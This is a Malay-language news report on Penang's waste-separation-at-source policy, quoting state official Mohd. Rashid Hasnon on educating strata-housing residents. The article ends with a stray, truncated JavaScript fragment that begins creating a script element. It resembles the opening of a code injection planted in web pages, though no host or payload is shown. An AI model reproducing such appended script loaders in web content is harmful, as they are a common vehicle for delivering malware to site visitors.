Pengasingan Sisa Di Punca, KN akan terus beri pendidikan – Rashid

Oleh : AINUL WARDAH SOHILLI

Gambar : SHUM JIANWEI

PANTAI JEREJAK – Sejak penguatkuasaan Dasar Pengasingan Sisa Di Punca bagi seluruh negeri pada 1 Jun lalu, respons rakyat Pulau Pinang amat memberangsangkan sungguhpun ada segelintir yang keliru berhubung kaedah pelaksanaannya.

Ahli Dewan Undangan Negeri (ADUN) Pantai Jerejak, Dato’ Mohd. Rashid Hasnon berkata, para penghuni di kediaman berstrata atau bertingkat seperti kondominium dan pangsapuri, masih keliru dengan kaedah pelaksanaan Dasar Pengasingan Sisa Di Punca.

Malah, menurut beliau, ada segelintir lagi yang tidak tahu bagaimana mengasingkan sisa mengikut komposisi sisa, sama ada sisa kitar semula dan sisa baki (sampah, sisa makanan).

“Kaedahnya (pengasingan sisa) sama sahaja seperti kediaman bertanah iaitu penghuni perlu mengasingkan sisa mengikut kategori, satu sisa yang boleh dikitar semula dan keduanya, sisa baki atau sampah.

“Bezanya cuma, kediaman bertanah ini meletakkan beg atau tong berisi bahan yang boleh dikitar semula di tepi tong sampah di hadapan rumah, tetapi bagi penghuni kediaman bertingkat, tempat pengumpulan barang kitar semula disediakan oleh Badan Pengurusan Bersama (JMB) atau Jawatankuasa Pengurusan (MC), kebiasaannya di aras bawah.

“Begitu juga waktu kutipan, bagi kediaman bertanah dilakukan setiap hari Sabtu oleh MBPP (Majlis Bandaraya Pulau Pinang), manakala bagi kediaman bertingkat akan ditentukan oleh JMB atau MC masing-masing,” katanya yang ditemui pada Majlis Perasmian Projek Pengasingan Sisa Di Punca Kategori Kediaman Berstrata/Bertingkat di Apartmen Nibong Indah, dekat sini baru-baru ini.

Hadir menyempurnakan majlis, Ketua Menteri. Y.A.B. Tuan Lim Guan Eng. Turut serta, Pengerusi Apartmen Nibong Indah, Dr. Mohd. Nizam Sahad; Pengerusi Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Sungai Nibong Pantai, Mohd. Nazri Idris dan beberapa Ahli Majlis MBPP. Mohd. Rashid yang juga Timbalan Ketua Menteri I, dalam pada itu turut memuji kesungguhan penghuni Apartmen Nibong Indah dalam menyahut seruan Kerajaan Negeri ke arah negeri hijau bertaraf global.

“Kita (Kerajaan Negeri) akan terus memberi pendidikan kepada semua rakyat Pulau Pinang, khususnya mereka yang tinggal di kediaman berstrata.

“Jadi, saya berharap agar setiap lapisan masyarakat di Pulau Pinang dapat memainkan peranan masing-masing secara aktif dalam memastikan kejayaan pelaksanaan dasar ini demi kelestarian alam sekitar kita,” seru beliau.

Dasar Pengasingan Sisa Di Punca akan dikuatkuasa secara mandatori mulai 1 Jun 2017.

Buat masa ini, pendedahan dan pendidikan giat dilaksanakan di semua peringkat termasuk pejabat pentadbiran kerajaan.

var d=document;var s=d.createElement(‘script’);